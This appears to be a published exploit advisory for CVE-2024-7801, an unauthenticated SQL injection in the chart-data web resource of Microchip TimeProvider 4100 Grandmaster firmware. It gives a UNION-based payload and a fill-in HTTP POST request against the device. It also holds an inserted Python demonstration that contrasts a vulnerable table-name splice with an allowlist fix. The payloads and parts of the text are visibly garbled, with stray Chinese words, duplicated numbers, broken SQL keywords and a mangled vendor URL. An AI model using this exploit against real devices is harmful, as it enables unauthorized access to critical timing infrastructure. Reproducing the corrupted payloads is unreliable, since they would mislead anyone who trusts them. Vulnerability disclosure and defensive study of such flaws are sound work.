
Microchip TimeProvider 4100 Grandmaster (Data Chart Module) 2.4.6 - SQL Injection

# Exploit Title: Microchip TimeProvider 4100 Grandmaster - Unauthenticated SQL Injection
# Exploit Author: Armando Huesca Prida, Marco Negro
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Disclosure Date: 27/06/2024
# CVE Publication Date: 4/10/2024
# Exploit Publication Date: 11/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware version 1.0 to 2.4.7
# Tested on: Firmware version 2.3.12
# CVE: CVE-2024-7801
# External References:
# URL: https://www.cve.org/CVERecord?id=CVE-2024-7801
# URL: https://www.0xhuesca.com/2024/10/cve-2024-7801.html
# URL: https://www.microchip.com/en-us/sol...urity-vulneribilities/timeprovider-4100--4100 grandmaster-unatthenticatienticatienticatecticated-sql-sql-indouss
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
The TimeProvider® 4100 Grandmaster firmware has a SQL injection vulnerability in the "GET_CHART_DATA" web resource: the "ChannelId" parameter is inserted directly, as the table name, into the SQL (SQLite) query that the resource builds to serve the request. An unauthenticated threat actor can manipulate the query to execute malicious SQL commands against the device.
# Example of a malicious SQL payload:
选择%20平方%202,%203,%204,%205,%206,%207,%208,%209,%209,%2010,%2011,%2013,%2013,%2014,%2015,%2016,%2016,%2017,%2017,%2018,%2018,%2020,%2020,%2020,%,%,%,% 2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040, %2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2048,%2049,%2050,%2051,%2052,%2052,%2053,%2054,%2054,%2055,%2055,%2056,%2057,%2057,%2058,%2058,%2059,2059,5059,5060 ,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20 from%20SQLITE_MASTER $ 20WHERD20THEWHESTYPE='table'table'$ 20Limit%201%201%20 offset%20 Offset%200--200-200--200--200--200--200-- 200---
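The following is an added illustration, not part of this advisory or of the vendor's firmware: a constructed SQLite stand-in that shows the table-name splicing pattern described above next to a hardened handler. Because SQLite cannot bind an identifier with a "?" placeholder, the fix for this bug class is an allowlist of channel tables, not parameter binding alone; the schema, the table naming (ChannelName + ChannelId) and the chart_data_* functions are assumptions.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the device's SQLite store. Assumption: one
# status table per channel, named ChannelName + ChannelId ("tenmhz1_status"),
# which matches the shape of the request body; the real schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tenmhz1_status (ts INTEGER, mtie REAL)")
    conn.executemany("INSERT INTO tenmhz1_status VALUES (?, ?)", [(1, 0.5), (2, 0.7)])
    return conn

def chart_data_vulnerable(conn, channel_name, channel_id):
    # The bug class in the advisory: the caller-supplied identifier is spliced
    # straight into the statement, so a UNION in ChannelId changes the query shape.
    table = channel_name + channel_id
    return conn.execute(f"SELECT ts, mtie FROM {table}").fetchall()

# Allowlist of table names the handler may ever read (constructed; a real
# firmware would derive it from its own fixed channel list).
ALLOWED_TABLES = frozenset({"tenmhz1_status"})
IDENT_RE = re.compile(r"[A-Za-z][A-Za-z0-9_]{0,31}")

def chart_data_hardened(conn, channel_name, channel_id):
    # Identifiers cannot be bound as parameters, so the table name is checked
    # against the allowlist before it is placed in the statement; it is then
    # also quoted as an identifier and the rest of the SELECT is fixed text.
    table = channel_name + channel_id
    if not IDENT_RE.fullmatch(table) or table not in ALLOWED_TABLES:
        raise ValueError("unknown channel: %r" % table)
    return conn.execute(f'SELECT ts, mtie FROM "{table}" ORDER BY ts').fetchall()

def hardened_rejects(conn, channel_name, channel_id):
    # True when the hardened handler refuses the input instead of querying.
    try:
        chart_data_hardened(conn, channel_name, channel_id)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    injected = "1_status UNION SELECT 0, name FROM sqlite_master"
    print(chart_data_vulnerable(db, "tenmhz", injected))  # extra rows from sqlite_master
    print(chart_data_hardened(db, "tenmhz", "1_status"))  # only the channel's own rows
    print(hardened_rejects(db, "tenmhz", injected))       # the same input is refused
```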
# Proof of Concept - PoC:
Malicious SQL commands can be executed against the device by manually modifying the following request. The values that must be updated in the exploit HTTP request are listed below:
  • [MALICIOUS SQL PAYLOAD]
  • [DEVICE IP]
# Exploit - HTTP Request:
POST /get_chart_data HTTP/1.1
Host: [DEVICE IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[DEVICE IP]
Referer: https://[DEVICE IP]/perfmon_synchrony_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
Connection: keep-alive

metric=mtie_axrange=1tstart=-1ChannelName=tenmhzChannelId=
1_status%20Union%20 [MALICIOUS SQL PAYLOAD] %20Union%20select%201,%202,%203,%204,%205,%206,%207,%208,%209,%209,%2010,%2011,%2013,%2013,%2014,%2014,%2015,%2015,%2016,%2016,%201 7,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2026,%2027,%2028,%2029,%2029,%2030,%2031,%2031,%2032,%2033,%2033,%2034,%2034,%203 5,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2044,%2045,%2046,%2047,%2047,%2048,%2049,%2049,%2050,%2050,%2051,%2052,%2052,%205,%205 3,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2064,%2065,%2066,%2066,%2067,%2068%2068%2068%20FOM%20FOM%20tenmhz1
# End